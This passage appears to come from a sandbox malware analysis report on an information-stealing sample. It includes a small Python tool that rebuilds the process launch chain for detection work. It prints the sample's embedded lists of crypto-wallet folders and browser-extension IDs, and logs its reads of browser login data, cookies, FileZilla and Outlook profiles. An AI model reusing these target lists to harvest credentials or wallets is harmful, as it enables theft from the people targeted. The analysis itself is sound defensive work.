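    r'Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"',
    r'Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe"',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe"',
]

# Assumed line layout: "Source: <parent> Process created: <image> <cmdline>"
LINE_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+) (?P<cmdline>.+)$")
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def basename(path):
    return path.rsplit("\\", 1)[-1]


def tokenize(cmdline):
    """Split a command line into (text, was_quoted) pairs. An empty quoted
    token ("") is kept because `start` gives it meaning."""
    out = []
    for m in TOKEN_RE.finditer(cmdline):
        if m.group(1) is not None:
            out.append((m.group(1), True))
        else:
            out.append((m.group(2), False))
    return out


def launched_target(cmdline):
    """Executable a command line really runs. `start` takes a leading quoted
    argument as the new window's title, so `start "" "C:\\x.exe"` uses the
    empty "" to make the quoted path the command rather than the title."""
    toks = tokenize(cmdline)
    if not toks:
        return ""
    image = toks[0][0]
    words = [t.lower() for t, _ in toks]
    if basename(image).lower() != "cmd.exe" or "/c" not in words:
        return image
    rest = toks[words.index("/c") + 1:]
    if not rest:
        return image
    if rest[0][0].lower() != "start":
        return rest[0][0]                 # cmd /c <program> ...
    args = rest[1:]
    if args and args[0][1]:               # quoted first argument: the title
        args = args[1:]
    i = 0
    while i < len(args):                  # skip start's own switches
        text = args[i][0]
        if text.lower() == "/d":          # /D takes a directory argument
            i += 2
        elif text.startswith("/"):
            i += 1
        else:
            return text
    return image


def launch_tree(lines):
    """Map parent image -> effective children. Edges whose parent is cmd.exe
    are dropped: that hop is already covered by the unwrapped edge from the
    process that spawned cmd.exe."""
    tree = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or basename(m["parent"]).lower() == "cmd.exe":
            continue
        if basename(m["image"]).lower() == "cmd.exe":
            child = launched_target(m["cmdline"])
        else:
            child = m["image"]
        kids = tree.setdefault(m["parent"], [])
        if child not in kids:
            kids.append(child)
    return tree


def lineage(tree, target):
    """Image names from the root process down to `target`."""
    parent_of = {c: p for p, cs in tree.items() for c in cs}
    chain = [target]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return [basename(p) for p in reversed(chain)]


if __name__ == "__main__":
    tree = launch_tree(REPORT_LINES)
    for parent, kids in tree.items():
        for kid in kids:
            print(f"{basename(parent)} -> {basename(kid)}")
    print(" > ".join(lineage(tree, r"C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe")))
```

Run stand-alone it prints the collapsed chain Wf9qnVcbi8.exe > IDGHDGIDAK.exe > explorti.exe > 528307a0ac.exe, with CFHDHIJDGC.exe as a second child of the submitted sample. The `start ""` handling is the part worth keeping: a detection rule that keys on the last quoted argument of cmd.exe will match the title slot on launchers that omit the empty title, so unwrap the command line rather than grabbing the last token.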
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B341 cpuid 0_2_6C57B341
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5435A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5435A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F6590 LookupAccountNameA, 12_2_002F6590
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 7.2.IDGHDGIDAK.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2243049461.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2646045722.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2198644151.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3235698523.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2234772240.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2275486715.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2239583360.0000000000AA1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2283301869.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2198516833.0000000001655000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 528307a0ac.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000618000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2198516833.0000000001655000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 528307a0ac.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR